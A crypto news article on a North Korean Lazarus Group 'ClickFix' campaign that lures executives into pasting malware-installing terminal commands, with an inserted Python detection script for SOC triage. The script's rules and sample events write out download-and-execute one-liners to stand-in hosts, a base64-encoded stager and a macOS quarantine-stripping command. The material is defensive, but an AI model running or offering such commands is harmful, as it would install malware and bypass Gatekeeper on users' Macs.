Lazarus Group Uses Fake Meetings to Hijack Crypto Firms
CMC Crypto News


3 days ago

The campaign uses a technique called ClickFix to gain entry into corporate systems.


North Korea's Lazarus Group is running a new cyberattack campaign targeting executives at crypto and fintech firms. Security researchers at CertiK disclosed the operation on Wednesday and named it "Mach-O Man."

The campaign uses a technique called ClickFix, a social-engineering method in which the victim is talked into running the attacker's command themselves, to gain entry into corporate systems. Attackers send targets an urgent meeting invitation over Telegram, directing them to what appears to be a standard Zoom, Microsoft Teams, or Google Meet link. The page that loads is fake: it instructs the user to paste a terminal command to fix a supposed connection problem. Running that command installs the malware on the victim's Mac, which gives the attackers immediate access to the victim's corporate systems, SaaS platforms, and financial accounts.

Natalie Newson, a senior blockchain security researcher at CertiK, told CoinDesk the malware is built from native Mach-O binaries designed specifically for Apple environments. It was developed by the Chollima division inside Lazarus Group. The kit is modular, and other criminal groups have already begun using it outside of the original Lazarus campaigns.

Newson said the attack is difficult to intercept because the victim completes the final step themselves. The page looks legitimate, the instructions appear routine, and standard security controls are not designed to catch a user running a command they chose to paste. By the time any breach is discovered, the malware has typically deleted itself.

Security researcher Vladimir S. noted on X that variations of Mach-O Man have already been used to hijack DeFi project domains. In those cases, attackers replaced legitimate websites with fake Cloudflare verification pages asking visitors to run a terminal command as part of a routine security check.
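The ClickFix flow described above, and the hijacked-domain variant with a fake Cloudflare check, both end the same way: a user pastes a download-and-run command into Terminal, which is exactly the step Newson says controls are not built to catch. One place where a detection can still be put is the shell or process-creation telemetry. The following is an added example, not code from CertiK or from the article, that triages JSON-lines process events (an assumed export shape with the fields ts, user, parent and cmd, not any vendor's schema) for the command shapes a ClickFix lure typically produces: fetch piped into a shell, a script run from a command substitution, a base64 literal decoded into a shell, and the macOS quarantine flag being stripped. The sample events, hostnames (all under .invalid) and the encoded stager are constructed for the example.

```python
"""Heuristic triage of ClickFix-style pasted commands (added example).

Input: JSON-lines process events with the fields ts, user, parent and cmd
(an assumed export shape, not any vendor's schema). Output: the events whose
command line downloads-and-executes, decodes-and-executes, or strips the
macOS quarantine flag, with the matching rule names and a severity.
"""
import base64
import json
import re
from dataclasses import dataclass, field

# Each rule fires on its own; the key is the detection label.
EXEC_RULES = {
    # fetched content piped straight into a shell:  curl -fsSL URL | bash
    "download_then_execute": re.compile(
        r"\b(?:curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?(?:ba|z|)sh\b"),
    # script run from a command substitution:  sh -c "$(curl URL)" / eval "$(curl URL)"
    "remote_script_eval": re.compile(
        r"(?:\b(?:ba|z|)sh\s+-c|\beval)\s+[\"']?\$\((?:curl|wget)\b"),
    # base64 literal decoded and executed:  echo ... | base64 -d | sh
    "base64_decoded_payload": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sudo\s+)?(?:ba|z|)sh\b"),
    # com.apple.quarantine removed so Gatekeeper never inspects the download
    "quarantine_bypass": re.compile(r"\bxattr\s+-\w*[dc]\w*\b"),
    # AppleScript or python one-liner used as a stage-0 downloader
    "scripted_downloader": re.compile(
        r"\bosascript\s+-e\b.*do shell script|\bpython3?\s+-c\b.*urllib"),
}
# Meeting / verification wording is the lure: it raises severity but never fires alone.
LURE_WORDS = re.compile(r"(?i)\b(?:zoom|teams|meet|cloudflare|verif\w*|fix)\b")
# Long base64 literals are decoded and re-scanned, so wrapping the stager in one does not hide it.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


@dataclass
class Finding:
    ts: str
    user: str
    parent: str          # app that owns the shell (Terminal, iTerm2, ...)
    cmd: str
    rules: list = field(default_factory=list)
    lure: bool = False

    @property
    def severity(self) -> str:
        if not self.rules:
            return "none"
        # two independent indicators, or lure wording, is the ClickFix shape
        return "high" if len(self.rules) > 1 or self.lure else "medium"


def match_rules(cmd: str) -> list:
    """Names of EXEC_RULES that fire on one command line, plus any that fire
    on the decoded form of an embedded base64 literal (prefixed 'decoded:')."""
    hits = [name for name, rx in EXEC_RULES.items() if rx.search(cmd)]
    for blob in B64_BLOB.findall(cmd):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:          # not really base64 (e.g. a long URL path)
            continue
        hits += ["decoded:" + n for n, rx in EXEC_RULES.items() if rx.search(inner)]
    return hits


def analyze(event: dict) -> Finding:
    f = Finding(event["ts"], event["user"], event["parent"], event["cmd"])
    f.rules = match_rules(f.cmd)
    f.lure = bool(LURE_WORDS.search(f.cmd))
    return f


def triage(jsonl: str) -> list:
    """Parse JSON-lines events and return only the findings that fired, in order."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        f = analyze(json.loads(line))
        if f.rules:
            findings.append(f)
    return findings


# Constructed sample: three lure commands, one quarantine strip, three benign lines.
# The base64 stager is built here so the sample stays readable; hostnames are .invalid.
STAGER_B64 = base64.b64encode(b"curl -s https://verify.example.invalid/p | sh").decode()
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2025-01-08T09:02:11Z", "user": "cfo", "parent": "Terminal",
     "cmd": "curl -fsSL https://zoom-fix.example.invalid/fix.sh | bash"},
    {"ts": "2025-01-08T09:05:40Z", "user": "cfo", "parent": "Terminal",
     "cmd": f"echo {STAGER_B64} | base64 -d | sh"},
    {"ts": "2025-01-08T09:06:02Z", "user": "cfo", "parent": "Terminal",
     "cmd": "xattr -d com.apple.quarantine ~/Downloads/MeetHelper"},
    {"ts": "2025-01-08T10:11:19Z", "user": "ops", "parent": "iTerm2",
     "cmd": 'bash -c "$(curl -fsSL https://verify.example.invalid/check)"'},
    {"ts": "2025-01-08T10:12:00Z", "user": "ops", "parent": "iTerm2",
     "cmd": "git pull origin main"},
    {"ts": "2025-01-08T10:12:30Z", "user": "ops", "parent": "iTerm2",
     "cmd": "curl -s https://api.example.invalid/status | jq .ok"},
    {"ts": "2025-01-08T10:13:05Z", "user": "ops", "parent": "iTerm2",
     "cmd": "brew install wget"},
])

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.ts} {f.user:<4} {f.severity:<6} {', '.join(f.rules)}  <- {f.cmd}")
```

The rules are deliberately narrow: a fetch piped to `jq`, a bare `brew install wget` or a plain `git pull` produce no finding, while the four lure-shaped lines do. Lure wording on its own is never a finding, because "fix" and "meet" appear in plenty of legitimate commands; it only raises a medium finding to high. The base64 re-scan is what keeps the obvious evasion (wrapping the stager in an `echo ... | base64 -d | sh`) visible. It is a triage aid for a SOC, not a block: in the campaign described the user is the one typing, so the realistic outcome is an alert shortly after the paste rather than prevention.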

Mauro Eldritch, founder of threat intelligence firm BCA Ltd., said the method is simple in execution and hard to stop because it relies entirely on the target's own action rather than a technical vulnerability.

Lazarus Group has accumulated an estimated $6.7 billion in stolen funds since 2017. Within the past month alone, the group has been linked to exploits at Drift and KelpDAO that drained more than $500 million combined. Newson said the pace of activity makes Lazarus more comparable to a state-run financial operation than a conventional hacking group.

"This isn't random hacking," Newson said. "It's a state-directed financial operation running at a scale and speed typical of institutions." She said the crypto industry needs to treat Lazarus the way banks treat nation-state cyber actors, as a constant and well-funded threat operating on an institutional timeline.

This article contains links to third-party websites or other content for information purposes only (“Third-Party Sites”). The Third-Party Sites are not under the control of CoinMarketCap, and CoinMarketCap is not responsible for the content of any Third-Party Site, including without limitation any link contained in a Third-Party Site, or any changes or updates to a Third-Party Site. CoinMarketCap is providing these links to you only as a convenience, and the inclusion of any link does not imply endorsement, approval or recommendation by CoinMarketCap of the site or any association with its operators. This article is intended to be used and must be used for informational purposes only. It is important to do your own research and analysis before making any material decisions related to any of the products or services described. This article is not intended as, and shall not be construed as, financial advice. The views and opinions expressed in this article are the author’s [company’s] own and do not necessarily reflect those of CoinMarketCap.